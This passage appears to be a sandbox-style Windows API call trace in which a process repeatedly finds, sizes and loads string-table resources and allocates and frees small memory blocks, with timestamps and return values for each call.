(lpModuleName=0x0) returned 0x400000 [0133.239] FindResourceW (hModule=0x400000, lpName=0x40d, lpType=0x7) returned 0x491400 [0133.239] SizeofResource (hModule=0x400000, hResInfo=0x491400) returned 0xdc [0133.239] LoadResource (hModule=0x400000, hResInfo=0x491400) returned 0x49b740 [0133.240] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.240] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.240] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.240] FindResourceW (hModule=0x400000, lpName=0x40e, lpType=0x7) returned 0x491410 [0133.240] SizeofResource (hModule=0x400000, hResInfo=0x491410) returned 0xdc [0133.240] LoadResource (hModule=0x400000, hResInfo=0x491410) returned 0x49b81c [0133.240] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.241] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.241] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.241] FindResourceW (hModule=0x400000, lpName=0x40f, lpType=0x7) returned 0x491420 [0133.241] SizeofResource (hModule=0x400000, hResInfo=0x491420) returned 0xdc [0133.241] LoadResource (hModule=0x400000, hResInfo=0x491420) returned 0x49b8f8 [0133.241] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.241] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.241] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.241] FindResourceW (hModule=0x400000, lpName=0x410, lpType=0x7) returned 0x491430 [0133.241] SizeofResource (hModule=0x400000, hResInfo=0x491430) returned 0xdc [0133.241] LoadResource (hModule=0x400000, hResInfo=0x491430) returned 0x49b9d4 [0133.241] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.242] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.242] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.242] FindResourceW (hModule=0x400000, lpName=0x411, lpType=0x7) returned 0x491440 [0133.242] SizeofResource (hModule=0x400000, hResInfo=0x491440) returned 0xdc [0133.242] LoadResource (hModule=0x400000, hResInfo=0x491440) returned 0x49bab0 [0133.242] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.242] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.242] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.243] FindResourceW (hModule=0x400000, lpName=0x412, lpType=0x7) returned 0x491450 [0133.243] SizeofResource (hModule=0x400000, hResInfo=0x491450) returned 0xdc [0133.243] LoadResource (hModule=0x400000, hResInfo=0x491450) returned 0x49bb8c [0133.243] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.243] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.243] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.243] FindResourceW (hModule=0x400000, lpName=0x413, lpType=0x7) returned 0x491460 [0133.243] SizeofResource (hModule=0x400000, hResInfo=0x491460) returned 0xdc [0133.243] LoadResource (hModule=0x400000, hResInfo=0x491460) returned 0x49bc68 [0133.243] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.244] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.244] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.244] FindResourceW (hModule=0x400000, lpName=0x414, lpType=0x7) returned 0x491470 [0133.244] SizeofResource (hModule=0x400000, hResInfo=0x491470) returned 0xdc [0133.244] LoadResource (hModule=0x400000, hResInfo=0x491470) returned 0x49bd44 [0133.244] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.244] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.244] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.244] FindResourceW (hModule=0x400000, lpName=0x415, lpType=0x7) returned 0x491480 [0133.244] SizeofResource (hModule=0x400000, hResInfo=0x491480) returned 0xdc [0133.244] LoadResource (hModule=0x400000, hResInfo=0x491480) returned 0x49be20 [0133.244] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.245] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.245] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.245] FindResourceW (hModule=0x400000, lpName=0x416, lpType=0x7) returned 0x491490 [0133.245] SizeofResource (hModule=0x400000, hResInfo=0x491490) returned 0xdc [0133.245] LoadResource (hModule=0x400000, hResInfo=0x491490) returned 0x49befc [0133.245] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.245] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.246] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.246] FindResourceW (hModule=0x400000, lpName=0x417, lpType=0x7) returned 0x4914a0 [0133.246] SizeofResource (hModule=0x400000, hResInfo=0x4914a0) returned 0xdc [0133.246] LoadResource (hModule=0x400000, hResInfo=0x4914a0) returned 0x49bfd8 [0133.246] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.246] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.246] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.246] FindResourceW (hModule=0x400000, lpName=0x418, lpType=0x7) returned 0x4914b0 [0133.246] SizeofResource (hModule=0x400000, hResInfo=0x4914b0) returned 0xdc [0133.246] LoadResource (hModule=0x400000, hResInfo=0x4914b0) returned 0x49c0b4 [0133.246] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.247] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.247] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.247] FindResourceW (hModule=0x400000, lpName=0x419, lpType=0x7) returned 0x4914c0 [0133.247] SizeofResource (hModule=0x400000, hResInfo=0x4914c0) returned 0xdc [0133.247] LoadResource (hModule=0x400000, hResInfo=0x4914c0) returned 0x49c190 [0133.247] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.247] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.247] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.248] FindResourceW (hModule=0x400000, lpName=0x41a, lpType=0x7) returned 0x4914d0 [0133.248] SizeofResource (hModule=0x400000, hResInfo=0x4914d0) returned 0xdc [0133.248] LoadResource (hModule=0x400000, hResInfo=0x4914d0) returned 0x49c26c [0133.248] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.248] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.248] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.248] FindResourceW (hModule=0x400000, lpName=0x41b, lpType=0x7) returned 0x4914e0 [0133.248] SizeofResource (hModule=0x400000, hResInfo=0x4914e0) returned 0xdc [0133.248] LoadResource (hModule=0x400000, hResInfo=0x4914e0) returned 0x49c348 [0133.248] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.249] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.249] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.249] FindResourceW (hModule=0x400000, lpName=0x41c, lpType=0x7) returned 0x4914f0 [0133.249] SizeofResource (hModule=0x400000, hResInfo=0x4914f0) returned 0xdc [0133.249] LoadResource (hModule=0x400000, hResInfo=0x4914f0) returned 0x49c424 [0133.249] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.250] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.250] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.250] FindResourceW (hModule=0x400000, lpName=0x41d, lpType=0x7) returned 0x491500 [0133.250] SizeofResource (hModule=0x400000, hResInfo=0x491500) returned 0xdc [0133.250] LoadResource (hModule=0x400000, hResInfo=0x491500) returned 0x49c500 [0133.250] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.251] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.251] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.251] FindResourceW (hModule=0x400000, lpName=0x41e, lpType=0x7) returned 0x491510 [0133.251] SizeofResource (hModule=0x400000, hResInfo=0x491510) returned 0xdc [0133.251] LoadResource (hModule=0x400000, hResInfo=0x491510) returned 0x49c5dc [0133.251] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.251] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.251] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.252] FindResourceW (hModule=0x400000, lpName=0x41f, lpType=0x7) returned 0x491520 [0133.252] SizeofResource (hModule=0x400000, hResInfo=0x491520) returned 0xdc [0133.252] LoadResource (hModule=0x400000, hResInfo=0x491520) returned 0x49c6b8 [0133.252] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.253] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.253] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.253] FindResourceW (hModule=0x400000, lpName=0x420, lpType=0x7) returned 0x491530 [0133.253] SizeofResource (hModule=0x400000, hResInfo=0x491530) returned 0xdc [0133.253] LoadResource (hModule=0x400000, hResInfo=0x491530) returned 0x49c794 [0133.253] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.253] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.254] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.254] FindResourceW (hModule=0x400000, lpName=0x421, lpType=0x7) returned 0x491540 [0133.254] SizeofResource (hModule=0x400000, hResInfo=0x491540) returned 0xdc [0133.254] LoadResource (hModule=0x400000, hResInfo=0x491540) returned 0x49c870 [0133.254] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.254] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.254] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.254] FindResourceW (hModule=0x400000, lpName=0x422, lpType=0x7) returned 0x491550 [0133.254] SizeofResource (hModule=0x400000, hResInfo=0x491550) returned 0xdc [0133.254] LoadResource (hModule=0x400000, hResInfo=0x491550) returned 0x49c94c [0133.254] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.255] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.255] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.255] FindResourceW (hModule=0x400000, lpName=0x423, lpType=0x7) returned 0x491560 [0133.255] SizeofResource (hModule=0x400000, hResInfo=0x491560) returned 0xdc [0133.255] LoadResource (hModule=0x400000, hResInfo=0x491560) returned 0x49ca28 [0133.255] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.255] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.255] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.255] FindResourceW (hModule=0x400000, lpName=0x424, lpType=0x7) returned 0x491570 [0133.255] SizeofResource (hModule=0x400000, hResInfo=0x491570) returned 0xdc [0133.255] LoadResource (hModule=0x400000, hResInfo=0x491570) returned 0x49cb04 [0133.256] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.256] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.256] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.256] FindResourceW (hModule=0x400000, lpName=0x425, lpType=0x7) returned 0x491580 [0133.256] SizeofResource (hModule=0x400000, hResInfo=0x491580) returned 0xdc [0133.256] LoadResource (hModule=0x400000, hResInfo=0x491580) returned 0x49cbe0 [0133.256] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.256] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.257] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.257] FindResourceW (hModule=0x400000, lpName=0x426, lpType=0x7) returned 0x491590 [0133.257] SizeofResource (hModule=0x400000, hResInfo=0x491590) returned 0xdc [0133.257] LoadResource (hModule=0x400000, hResInfo=0x491590) returned 0x49ccbc [0133.257] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.257] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.257] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.257] FindResourceW (hModule=0x400000, lpName=0x427, lpType=0x7) returned 0x4915a0 [0133.257] SizeofResource (hModule=0x400000, hResInfo=0x4915a0) returned 0xdc [0133.257] LoadResource (hModule=0x400000, hResInfo=0x4915a0) returned 0x49cd98 [0133.257] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.258] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.258] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.258] FindResourceW (hModule=0x400000, lpName=0x428, lpType=0x7) returned 0x4915b0 [0133.258] SizeofResource (hModule=0x400000, hResInfo=0x4915b0) returned 0xdc [0133.258] LoadResource (hModule=0x400000, hResInfo=0x4915b0) returned 0x49ce74 [0133.258] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.258] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.258] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.259] FindResourceW (hModule=0x400000, lpName=0x429, lpType=0x7) returned 0x4915c0 [0133.259] SizeofResource (hModule=0x400000, hResInfo=0x4915c0) returned 0xdc [0133.259] LoadResource (hModule=0x400000, hResInfo=0x4915c0) returned 0x49cf50 [0133.259] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.259] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.259] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.259] FindResourceW (hModule=0x400000, lpName=0x42a, lpType=0x7) returned 0x4915d0 [0133.259] SizeofResource (hModule=0x400000, hResInfo=0x4915d0) returned 0xdc [0133.259] LoadResource (hModule=0x400000, hResInfo=0x4915d0) returned 0x49d02c [0133.259] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.260] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.260] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.260] FindResourceW (hModule=0x400000, lpName=0x42b, lpType=0x7) returned 0x4915e0 [0133.260] SizeofResource (hModule=0x400000, hResInfo=0x4915e0) returned 0xdc [0133.260] LoadResource (hModule=0x400000, hResInfo=0x4915e0) returned 0x49d108 [0133.260] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.260] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.260] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.260] FindResourceW (hModule=0x400000, lpName=0x42c, lpType=0x7) returned 0x4915f0 [0133.260] SizeofResource (hModule=0x400000, hResInfo=0x4915f0) returned 0xdc [0133.260] LoadResource (hModule=0x400000, hResInfo=0x4915f0) returned 0x49d1e4 [0133.260] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.261] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.261] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.261] FindResourceW (hModule=0x400000, lpName=0x42d, lpType=0x7) returned 0x491600 [0133.261] SizeofResource (hModule=0x400000, hResInfo=0x491600) returned 0xdc [0133.261] LoadResource (hModule=0x400000, hResInfo=0x491600) returned 0x49d2c0 [0133.261] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.261] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.262] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.262] FindResourceW (hModule=0x400000, lpName=0x42e, lpType=0x7) returned 0x491610 [0133.262] SizeofResource (hModule=0x400000, hResInfo=0x491610) returned 0xdc [0133.262] LoadResource (hModule=0x400000, hResInfo=0x491610) returned 0x49d39c [0133.262] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.262] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.262] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.262] FindResourceW (hModule=0x400000, lpName=0x42f, lpType=0x7) returned 0x491620 [0133.262] SizeofResource (hModule=0x400000, hResInfo=0x491620) returned 0xdc [0133.262] LoadResource (hModule=0x400000, hResInfo=0x491620) returned 0x49d478 [0133.262] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.263] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.263] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.263] FindResourceW (hModule=0x400000, lpName=0x430, lpType=0x7) returned 0x491630 [0133.263] SizeofResource (hModule=0x400000, hResInfo=0x491630) returned 0xdc [0133.263] LoadResource (hModule=0x400000, hResInfo=0x491630) returned 0x49d554 [0133.263] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.263] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.263] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.263] FindResourceW (hModule=0x400000, lpName=0x431, lpType=0x7) returned 0x491640 [0133.263] SizeofResource (hModule=0x400000, hResInfo=0x491640) returned 0xdc [0133.263] LoadResource (hModule=0x400000, hResInfo=0x491640) returned 0x49d630 [0133.263] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.264] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.264] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.264] FindResourceW (hModule=0x400000, lpName=0x432, lpType=0x7) returned 0x491650 [0133.264] SizeofResource (hModule=0x400000, hResInfo=0x491650) returned 0xdc [0133.264] LoadResource (hModule=0x400000, hResInfo=0x491650) returned 0x49d70c [0133.264] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.264] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.265] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.265] FindResourceW (hModule=0x400000, lpName=0x433, lpType=0x7) returned 0x491660 [0133.265] SizeofResource (hModule=0x400000, hResInfo=0x491660) returned 0xdc [0133.265] LoadResource (hModule=0x400000, hResInfo=0x491660) returned 0x49d7e8 [0133.265] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.265] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.265] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.265] FindResourceW (hModule=0x400000, lpName=0x434, lpType=0x7) returned 0x491670 [0133.265] SizeofResource (hModule=0x400000, hResInfo=0x491670) returned 0xdc [0133.265] LoadResource (hModule=0x400000, hResInfo=0x491670) returned 0x49d8c4 [0133.265] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.266] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.266] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.266] FindResourceW (hModule=0x400000, lpName=0x435, lpType=0x7) returned 0x491680 [0133.266] SizeofResource (hModule=0x400000, hResInfo=0x491680) returned 0xdc [0133.266] LoadResource (hModule=0x400000, hResInfo=0x491680) returned 0x49d9a0 [0133.266] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.266] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.267] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.267] FindResourceW (hModule=0x400000, lpName=0x436, lpType=0x7) returned 0x491690 [0133.267] SizeofResource (hModule=0x400000, hResInfo=0x491690) returned 0xdc [0133.267] LoadResource (hModule=0x400000, hResInfo=0x491690) returned 0x49da7c [0133.267] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.267] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.267] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.267] FindResourceW (hModule=0x400000, lpName=0x437, lpType=0x7) returned 0x4916a0 [0133.267] SizeofResource (hModule=0x400000, hResInfo=0x4916a0) returned 0xdc [0133.267] LoadResource (hModule=0x400000, hResInfo=0x4916a0) returned 0x49db58 [0133.267] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.268] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.268] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.268] FindResourceW (hModule=0x400000, lpName=0x438, lpType=0x7) returned 0x4916b0 [0133.268] SizeofResource (hModule=0x400000, hResInfo=0x4916b0) returned 0xdc [0133.268] LoadResource (hModule=0x400000, hResInfo=0x4916b0) returned 0x49dc34 [0133.268] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.268] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.268] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.268] FindResourceW (hModule=0x400000, lpName=0x439, lpType=0x7) returned 0x4916c0 [0133.268] SizeofResource (hModule=0x400000, hResInfo=0x4916c0) returned 0xdc [0133.268] LoadResource (hModule=0x400000, hResInfo=0x4916c0) returned 0x49dd10 [0133.268] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.269] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.269] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.269] FindResourceW (hModule=0x400000, lpName=0x43a, lpType=0x7) returned 0x4916d0 [0133.269] SizeofResource (hModule=0x400000, hResInfo=0x4916d0) returned 0xdc [0133.269] LoadResource (hModule=0x400000, hResInfo=0x4916d0) returned 0x49ddec [0133.269] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.269] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.270] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.270] FindResourceW (hModule=0x400000, lpName=0x43b, lpType=0x7) returned 0x4916e0 [0133.270] SizeofResource (hModule=0x400000, hResInfo=0x4916e0) returned 0xdc [0133.270] LoadResource (hModule=0x400000, hResInfo=0x4916e0) returned 0x49dec8 [0133.270] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.270] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.270] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.270] FindResourceW (hModule=0x400000, lpName=0x43c, lpType=0x7) returned 0x4916f0 [0133.270] SizeofResource (hModule=0x400000, hResInfo=0x4916f0) returned 0xdc [0133.270] LoadResource (hModule=0x400000, hResInfo=0x4916f0) returned 0x49dfa4 [0133.270] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.271] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.271] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.271] FindResourceW (hModule=0x400000, lpName=0x43d, lpType=0x7) returned 0x491700 [0133.271] SizeofResource (hModule=0x400000, hResInfo=0x491700) returned 0xdc [0133.271] LoadResource (hModule=0x400000, hResInfo=0x491700) returned 0x49e080 [0133.271] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.271] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.271] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.271] FindResourceW (hModule=0x400000, lpName=0x43e, lpType=0x7) returned 0x491710 [0133.271] SizeofResource (hModule=0x400000, hResInfo=0x491710) returned 0xdc [0133.271] LoadResource (hModule=0x400000, hResInfo=0x491710) returned 0x49e15c [0133.272] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.272] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.272] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.272] FindResourceW (hModule=0x400000, lpName=0x43f, lpType=0x7) returned 0x491720 [0133.272] SizeofResource (hModule=0x400000, hResInfo=0x491720) returned 0xdc [0133.272] LoadResource (hModule=0x400000, hResInfo=0x491720) returned 0x49e238 [0133.272] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.272] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.273] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.273] FindResourceW (hModule=0x400000, lpName=0x440, lpType=0x7) returned 0x491730 [0133.273] SizeofResource (hModule=0x400000, hResInfo=0x491730) returned 0xdc [0133.273] LoadResource (hModule=0x400000, hResInfo=0x491730) returned 0x49e314 [0133.273] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.273] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.273] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0133.273] FindResourceW (hModule=0x400000, lpName=0x441, lpType=0x7) returned 0x491740 [0133.273] SizeofResource (hModule=0x400000, hResInfo=0x491740) returned 0xdc [0133.273] LoadResource (hModule=0x400000, hResInfo=0x491740) returned 0x49e3f0 [0133.273] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x3f0000 [0133.274] VirtualFree (lpAddress=0x3f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0133.274] 